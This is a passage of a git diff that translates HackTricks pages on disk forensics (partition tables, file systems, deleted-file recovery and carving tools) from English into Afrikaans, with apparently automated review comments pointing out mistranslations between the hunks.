te benoem met tot 36 Unicode-karakters. -- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits. -- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data. -- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters. +**Databestendigheid en -herwinning**: -**Data Resilience and Recovery**: +- **Redundansie**: Anders as MBR beperk GPT partisionering en opstartdata nie tot 'n enkele plek nie. Dit dupliseer hierdie data oor die skyf, wat data-integriteit en bestendigheid verbeter. +- **Sikliese Redundansie Kontrole (CRC)**: GPT gebruik CRC om data-integriteit te verseker. 
Dit monitor aktief vir datakorrupsie, en wanneer dit opgespoor word, probeer GPT om die gekorruppeerde data van 'n ander skyfplek te herstel. -- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience. -- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location. +**Beskermende MBR (LBA0)**: -**Protective MBR (LBA0)**: - -- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks. +- GPT handhaaf agterwaartse verenigbaarheid deur middel van 'n beskermende MBR. Hierdie funksie bly in die erfenis MBR-ruimte, maar is ontwerp om te voorkom dat ouer MBR-gebaseerde hulpprogramme GPT-skywe per ongeluk oorskryf, en sodoende die data-integriteit op GPT-geformateerde skywe beskerm. ![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../.gitbook/assets/image (491).png>) -**Hybrid MBR (LBA 0 + GPT)** +**Hibriede MBR (LBA 0 + GPT)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) -In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes. 
+In bedryfstelsels wat **GPT-gebaseerde opstart deur BIOS**-dienste ondersteun eerder as EFI, kan die eerste sektor ook steeds gebruik word om die eerste stadium van die **opstartlader**-kode te stoor, maar **aangepas** om **GPT-partisies** te herken. Die opstartlader in die MBR mag nie 'n sektor-grootte van 512 byte aanneem nie. -**Partition table header (LBA 1)** +**Partisietabelkop (LBA 1)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) -The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table). +Die partisietabelkop definieer die bruikbare blokke op die skyf. Dit definieer ook die aantal en grootte van die partisieinskrywings wat die partisietabel uitmaak (offsets 80 en 84 in die tabel). -| Offset | Length | Contents | -| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)on little-endian machines) | -| 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 | -| 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) | -| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation | -| 20 (0x14) | 4 bytes | Reserved; must be zero | -| 24 (0x18) | 8 bytes | Current LBA (location of this header copy) | -| 32 (0x20) | 8 bytes | Backup LBA (location of the other header copy) | -| 40 (0x28) | 8 bytes | First usable LBA for partitions (primary partition table last LBA 
+ 1) | -| 48 (0x30) | 8 bytes | Last usable LBA (secondary partition table first LBA − 1) | -| 56 (0x38) | 16 bytes | Disk GUID in mixed endian | -| 72 (0x48) | 8 bytes | Starting LBA of an array of partition entries (always 2 in primary copy) | -| 80 (0x50) | 4 bytes | Number of partition entries in array | -| 84 (0x54) | 4 bytes | Size of a single partition entry (usually 80h or 128) | -| 88 (0x58) | 4 bytes | CRC32 of partition entries array in little endian | -| 92 (0x5C) | \* | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes) | +| Offset | Lengte | Inhoud | +| --------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| 0 (0x00) | 8 byte | Handtekening ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h of 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)op klein-eindige masjiene) | +| 8 (0x08) | 4 byte | Hersiening 1.0 (00h 00h 01h 00h) vir UEFI 2.8 | +| 12 (0x0C) | 4 byte | Kopgrootte in klein-eindige (in byte, gewoonlik 5Ch 00h 00h 00h of 92 byte) | +| 16 (0x10) | 4 byte | [CRC32](https://en.wikipedia.org/wiki/CRC32) van die kop (offset +0 tot kopgrootte) in klein-eindige, met hierdie veld nul gemaak tydens berekening | +| 20 (0x14) | 4 byte | Voorbehou; moet nul wees | +| 24 (0x18) | 8 byte | Huidige LBA (ligging van hierdie kopie van die kop) | +| 32 (0x20) | 8 byte | Rugsteun LBA (ligging van die ander kopie van die kop) | +| 40 (0x28) | 8 byte | Eerste bruikbare LBA vir partisies (laaste LBA van primêre partisietabel + 1) | +| 48 (0x30) | 8 byte | Laaste bruikbare LBA (eerste LBA van sekondêre partisietabel - 1) | +| 56 (0x38) | 16 byte | Skyf-GUID in gemengde eindige | +| 72 (0x48) | 8 byte | Begin-LBA van 'n reeks partisieinskrywings (altyd 2 in primêre kopie) | +| 80 (0x50) | 4 byte | 
Aantal partisieinskrywings in reeks | +| 84 (0x54) | 4 byte | Grootte van 'n enkele partisieinskrywing (gewoonlik 80h of 128) | +| 88 (0x58) | 4 byte | CRC32 van die reeks partisieinskrywings in klein-eindige | +| 92 (0x5C) | \* | Voorbehou; moet nulle wees vir die res van die blok (420 byte vir 'n sektorgrootte van 512 byte; maar kan meer wees met groter sektorgroottes) | -**Partition entries (LBA 2–33)** +**Partisieinskrywings (LBA 2–33)** -| GUID partition entry format | | | -| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- | -| Offset | Length | Contents | -| 0 (0x00) | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (mixed endian) | -| 16 (0x10) | 16 bytes | Unique partition GUID (mixed endian) | -| 32 (0x20) | 8 bytes | First LBA ([little endian](https://en.wikipedia.org/wiki/Little\_endian)) | -| 40 (0x28) | 8 bytes | Last LBA (inclusive, usually odd) | -| 48 (0x30) | 8 bytes | Attribute flags (e.g. bit 60 denotes read-only) | -| 56 (0x38) | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units) | +| GUID-partisieinskrywingsformaat | | | +| ------------------------------ | -------- | ------------------------------------------------------------------------------------------------------------------- | +| Offset | Lengte | Inhoud | +| 0 (0x00) | 16 byte | [Partisietipe-GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (gemengde eindige) | +| 16 (0x10) | 16 byte | Unieke partisie-GUID (gemengde eindige) | +| 32 (0x20) | 8 byte | Eerste LBA ([klein-eindige](https://en.wikipedia.org/wiki/Little\_endian)) | +| 40 (0x28) | 8 byte | Laaste LBA (inklusief, gewoonlik oneweredig) | +| 48 (0x30) | 8 byte | Kenmerkvlaggies (bv. 
bit 60 dui op skryfbeskerming) | +| 56 (0x38) | 72 byte | Partisienaam (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE-kode-eenhede) | -**Partitions Types** +**Partisietipes** ![](<../../../.gitbook/assets/image (492).png>) -More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) +Meer partisietipes in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) -### Inspecting +### Inspekteer -After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted: +Nadat die forensiese beeld met [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) gemoniteer is, kan jy die eerste sektor inspekteer met die Windows-hulpmiddel [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In die volgende afbeelding is 'n **MBR** op **sektor 0** opgespoor en geïnterpreteer: ![](<../../../.gitbook/assets/image (494).png>) -If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty). +As dit 'n **GPT-tabel in plaas van 'n MBR** was, sou die handtekening _EFI PART_ in **sektor 1** verskyn (wat in die vorige afbeelding leeg is). +## Lêerstelsels -## File-Systems - -### Windows file-systems list +### Lys van Windows-lêerstelsels * **FAT12/16**: MSDOS, WIN95/98/NT/200 * **FAT32**: 95/2000/XP/2003/VISTA/7/8/10 
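Review bot: Two mistranslations in this hunk change the technical meaning. In the Inspecting section, "Nadat die forensiese beeld met ArsenalImageMounter gemoniteer is" says the image was monitored; the source says mounted, so it should read "gemonteer". In the GPT partition-entry table, "Laaste LBA (inklusief, gewoonlik oneweredig)" renders "usually odd" as disproportionate; the intended word is "onewe" (an odd number). Terminology is also inconsistent within the hunk: endianness appears as "little endian" (untranslated, in the MBR partition-record table), "klein-eindige" (GPT header table) and "gemengde eindige", and the page title "Partisies/ Lêersisteme/ Uitsnyding" says "Lêersisteme" while the section heading further down is "## Lêerstelsels"; choose one term for each and use it throughout. Finally, the blank lines around the mount code block were dropped ("+En gebruik dan die volgende kode" runs straight into the bash code fence, and the closing fence runs into "+**LBA (Logiese blokadressering)**"); keep those blank lines so the translated file stays structurally aligned with the English source for future diff-based syncs.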
@@ -165,81 +162,81 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI ### FAT -The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process. +Die **FAT (File Allocation Table)** lêerstelsel is ontwerp rondom sy kernkomponent, die lêertoewysingstabel, wat by die begin van die volume geplaas is. Hierdie stelsel beskerm data deur **twee kopieë** van die tabel te behou, wat data-integriteit verseker selfs as een daarvan beskadig is. Die tabel, tesame met die hoofmap, moet in 'n **vasgestelde posisie** wees, wat noodsaaklik is vir die opstartproses van die stelsel. -The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions: +Die basiese eenheid van stoor van die lêerstelsel is 'n **kluster, gewoonlik 512B**, wat uit verskeie sektore bestaan. FAT het deur weergawes geëvolueer: -- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX). -- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters. -- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume. +- **FAT12**, wat 12-bits klusteradres ondersteun en tot 4078 klusters hanteer (4084 met UNIX). +- **FAT16**, wat verbeter tot 16-bits adresse, en dus tot 65,517 klusters kan akkommodeer. +- **FAT32**, wat verder gevorder het met 32-bits adresse, wat 'n indrukwekkende 268,435,456 klusters per volume moontlik maak. -A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage. 
+'n Belangrike beperking oor alle FAT-weergawes is die **maksimum lêergrootte van 4GB**, wat opgelê word deur die 32-bits veld wat vir lêergrootte stoor gebruik word. -Key components of the root directory, particularly for FAT12 and FAT16, include: +Sleutelkomponente van die hoofgids, veral vir FAT12 en FAT16, sluit in: -- **File/Folder Name** (up to 8 characters) -- **Attributes** -- **Creation, Modification, and Last Access Dates** -- **FAT Table Address** (indicating the start cluster of the file) -- **File Size** +- **Lêer/Map Naam** (tot 8 karakters) +- **Eienskappe** +- **Skep-, Wysigings- en Laaste Toegangsdatums** +- **FAT Tabeladres** (wat die beginkluster van die lêer aandui) +- **Lêergrootte** ### EXT -**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. +**Ext2** is die mees algemene lêerstelsel vir **nie-joernalering** partisies (**partisies wat nie veel verander nie**) soos die opstartpartisie. **Ext3/4** is **joernalering** en word gewoonlik gebruik vir die **res van die partisies**. ## **Metadata** -Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like: +Sommige lêers bevat metadata. 
Hierdie inligting gaan oor die inhoud van die lêer wat soms interessant kan wees vir 'n analis as gevolg van die lêertipe, wat inligting soos die volgende kan bevat: -* Title -* MS Office Version used -* Author -* Dates of creation and last modification -* Model of the camera -* GPS coordinates -* Image information +* Titel +* MS Office-weergawe wat gebruik is +* Outeur +* Skep- en laaste wysigingsdatums +* Kamera model +* GPS-koördinate +* Beeldinligting -You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file. +Jy kan hulpmiddels soos [**exiftool**](https://exiftool.org) en [**Metadiver**](https://www.easymetadata.com/metadiver-2/) gebruik om die metadata van 'n lêer te verkry. -## **Deleted Files Recovery** +## **Herwinning van Verwyderde Lêers** -### Logged Deleted Files +### Gelogde Verwyderde Lêers -As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files. +Soos voorheen gesien is daar verskeie plekke waar die lêer steeds gestoor word nadat dit "verwyder" is. Dit is omdat die verwydering van 'n lêer uit 'n lêerstelsel dit gewoonlik merk as verwyder, maar die data word nie geraak nie. Daarom is dit moontlik om die rekords van die lêers (soos die MFT) te ondersoek en die verwyderde lêers te vind. -Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible. +Die bedryfstelsel stoor ook gewoonlik baie inligting oor lêerstelselveranderinge en rugsteun, so dit is moontlik om te probeer om dit te gebruik om die lêer of soveel moontlike inligting te herwin. 
{% content-ref url="file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) {% endcontent-ref %} -### **File Carving** +### **Lêer Carving** -**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself. +**Lêer carving** is 'n tegniek wat probeer om lêers in die massa data te vind. Daar is 3 hoofmaniere waarop sulke gereedskap werk: **Gebaseer op lêertipes se koppe en voette**, gebaseer op lêertipes se **strukture** en gebaseer op die **inhoud** self. -Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. +Let daarop dat hierdie tegniek **nie werk om gefragmenteerde lêers te herwin nie**. As 'n lêer **nie in aaneenlopende sektore gestoor word nie**, sal hierdie tegniek dit nie kan vind nie, of ten minste 'n deel daarvan. -There are several tools that you can use for file Carving indicating the file types you want to search for +Daar is verskeie gereedskap wat jy kan gebruik vir lêer Carving deur die lêertipes aan te dui wat jy wil soek {% content-ref url="file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) {% endcontent-ref %} -### Data Stream **C**arving +### Datastroom **C**arving -Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\ -For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs. 
+Datastroom Carving is soortgelyk aan Lêer Carving, maar **in plaas daarvan om volledige lêers te soek, soek dit na interessante fragmente** van inligting.\ +Byvoorbeeld, in plaas daarvan om 'n volledige lêer te soek wat gelogde URL's bevat, sal hierdie tegniek soek na URL's. {% content-ref url="file-data-carving-recovery-tools.md" %} [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) {% endcontent-ref %} -### Secure Deletion +### Veilige Verwydering -Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\ -You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them. +Daar is natuurlik maniere om lêers en dele van logboeke oor hulle **"veilig" te verwyder**. Dit is byvoorbeeld moontlik om die inhoud van 'n lêer herhaaldelik met rommeldata te **oorlê**, en dan die **logboeke** van die **$MFT** en **$LOGFILE** oor die lêer te **verwyder**, en die **Volume Shadow Copies** te **verwyder**.\ +Jy mag opmerk dat selfs nadat daardie aksie uitgevoer is, daar **ander dele is waar die bestaan van die lêer steeds gelog word**, en dit is waar en deel van die forensiese professionele se werk is om dit te vind. -## References +## Verwysings * [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) * [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm) @@ -249,14 +246,14 @@ You may notice that even performing that action there might be **other parts whe
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
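Review bot: In the Secure Deletion paragraph of the preceding @@ -165,81 +162,81 @@ hunk, "die inhoud van 'n lêer herhaaldelik met rommeldata te oorlê" mistranslates overwrite: "oorlê" means to overlay, and the same file already uses "oorskryf" for overwriting GPT disks in the protective-MBR paragraph, so use "oorskryf" here as well. In the Metadata paragraph, "interessant kan wees vir 'n analis as gevolg van die lêertipe" turns "depending on the file type" into "because of the file type"; "afhangende van die lêertipe" keeps the original meaning. "deel van die forensiese professionele se werk" is ungrammatical; "deel van die forensiese kundige se werk" reads naturally. The heading "### **Lêer Carving**" also leaves carving untranslated while the page title in the first hunk renders it as "Uitsnyding"; settle on one term for the whole file.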
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index 01871c96c..eb77551c5 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -1,136 +1,124 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -# Carving & Recovery tools +# Carving & Herstelgereedskap -More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) +Meer gereedskap in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) ## Autopsy -The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files. +Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer insluk om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelders en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie. ## Binwalk -**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk). 
- -**Useful commands**: +**Binwalk** is 'n gereedskap vir die analise van binêre lêers om ingebedde inhoud te vind. Dit kan geïnstalleer word via `apt` en die bronkode is op [GitHub](https://github.com/ReFirmLabs/binwalk). +**Nuttige opdragte**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file binwalk -e file #Displays and extracts some files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file ``` - ## Foremost -Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types. - +'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes. ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` - ## **Scalpel** -**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract. - +**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_). 
```bash sudo apt-get install scalpel scalpel file.img -o output ``` - ## Bulk Extractor -This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor) - -This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do: +Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk\_extractor) +Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting (URL's, domeine, IP's, MAC's, e-posse)** en meer **lêers**. Jy hoef net te doen: ``` bulk_extractor memory.img -o out_folder ``` - -Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**). +Navigeer deur **alle inligting** wat die instrument ingesamel het (wagwoorde?), **analiseer** die **pakkies** (lees [**Pcaps-analise**](../pcap-inspection/)), soek na **vreemde domeine** (domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande** domeine). ## PhotoRec -You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download) +Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download) -It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for. +Dit kom met GUI- en CLI-weergawes. Jy kan die **lêertipes** kies wat PhotoRec moet soek. ![](<../../../.gitbook/assets/image (524).png>) ## binvis -Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/). 
+Kyk na die [kode](https://code.google.com/archive/p/binvis/) en die [webwerf-instrument](https://binvis.io/#/). -### Features of BinVis +### Kenmerke van BinVis -* Visual and active **structure viewer** -* Multiple plots for different focus points -* Focusing on portions of a sample -* **Seeing stings and resources**, in PE or ELF executables e. g. -* Getting **patterns** for cryptanalysis on files -* **Spotting** packer or encoder algorithms -* **Identify** Steganography by patterns -* **Visual** binary-diffing +* Visuele en aktiewe **struktuurkyker** +* Verskeie grafieke vir verskillende fokuspunte +* Fokus op dele van 'n monster +* **Sien reekse en hulpbronne**, in PE- of ELF-uitvoerbare lêers, byvoorbeeld +* Kry **patrone** vir kripto-analise van lêers +* **Opmerk** verpakker- of enkodeeralgoritmes +* **Identifiseer** steganografie deur patrone +* **Visuele** binêre verskil -BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario. +BinVis is 'n goeie **beginpunt om bekend te raak met 'n onbekende teiken** in 'n swart-boks scenario. -# Specific Data Carving Tools +# Spesifieke Data Carving-instrumente ## FindAES -Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. +Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word. -Download [here](https://sourceforge.net/projects/findaes/). +Laai dit hier af: [here](https://sourceforge.net/projects/findaes/). -# Complementary tools +# Aanvullende instrumente -You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\ -You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. 
+Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien.\ +Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te skakel na teks en dit te lees.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
